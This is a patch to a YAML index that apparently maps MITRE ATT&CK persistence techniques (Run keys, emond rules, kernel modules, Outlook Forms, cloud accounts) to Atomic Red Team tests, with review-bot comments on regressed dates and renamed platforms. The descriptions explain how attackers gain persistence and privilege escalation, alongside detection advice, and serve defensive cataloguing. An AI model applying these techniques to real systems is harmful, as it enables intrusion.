- Windows
x_mitre_version: '1.0'
@@ -35876,8 +36305,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -35888,7 +36317,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
@@ -35929,7 +36359,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
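Review bot: `modified` moves backwards here, from '2022-05-11T14:00:00.188Z' to '2022-04-20T00:16:01.732Z', and the same regression appears later in this patch for T1574.010 (2023-05-09 to 2023-03-30), KernelCallbackTable (2022-05-11 to 2022-03-22) and ROMMONkit (2021-04-29 to 2020-10-22), while every other object moves forward. If the new values come from a different field or source bundle than the old ones, say so in the commit message; otherwise a consumer that uses `modified` to decide which entries changed will skip these four.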
@@ -35949,7 +36379,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests:
- name: Persistance with Event Monitor - emond
@@ -35976,7 +36405,7 @@ persistence:
elevation_required: true
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -36030,11 +36459,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -36121,9 +36549,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -36136,12 +36564,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -36154,9 +36581,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -36165,13 +36594,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
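Review bot: the platform list changes meaning here, not just spelling: 'Azure AD', 'Office 365' and 'Google Workspace' are removed and 'Office Suite' and 'Identity Provider' added (T1098 gets the same treatment later in this patch). Anything that selects or indexes atomics by the old platform strings will silently match nothing for these techniques, so the per-platform index generation should be checked in the same change. The version bump to '1.6' is the right signal that this is a content change rather than a reformat.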
@@ -36219,14 +36648,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -36262,16 +36688,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -36312,143 +36737,141 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests:
- name: MacOS - Load Kernel Module via kextload and kmutil
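Review bot: almost all of this 143/141-line hunk is key reordering (`x_mitre_platforms`, `description`, `x_mitre_detection` and `kill_chain_phases` moving up, and every `external_references` entry having its `url` moved below its `description`); the substantive changes are `modified`, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0, the iDefense reference switching to https with a new retrieval date, and `spec_version` dropped. Emitting keys in a stable order from the generator would keep hunks like this to a handful of lines and make the real edits reviewable.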
@@ -36558,7 +36981,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -36584,12 +37007,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
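Review bot: for the KernelCallbackTable entry this hunk removes `x_mitre_attack_spec_version: 2.1.0` together with `spec_version`, with no replacement in view, whereas every other object in the patch keeps or bumps `x_mitre_attack_spec_version` (mostly to 3.2.0). Confirm the field is re-emitted higher up in that object, otherwise this entry ends up the only one without it. The T1053.006 `modified` bump in the same hunk looks fine.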
@@ -36667,9 +37088,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -36696,7 +37116,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -36718,41 +37138,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
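Review bot: in the ROMMONkit tail of this hunk both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing replaces them, whereas T1053.006 above and T1137.003 here are bumped to 3.2.0; T1505.004 and T1037.003 later in the patch lose both fields the same way. Confirm the field is emitted elsewhere in those objects, otherwise the file now mixes objects with and without `x_mitre_attack_spec_version`. Separately, most of the lines removed under T1137.003 (platforms, domains, marking, id, type, created, external_references) come back in the next hunk in a different key order; sorting keys deterministically in the generator would leave only the substantive changes (the `modified` bump, platforms, version) visible in future diffs.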
@@ -36761,22 +37150,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
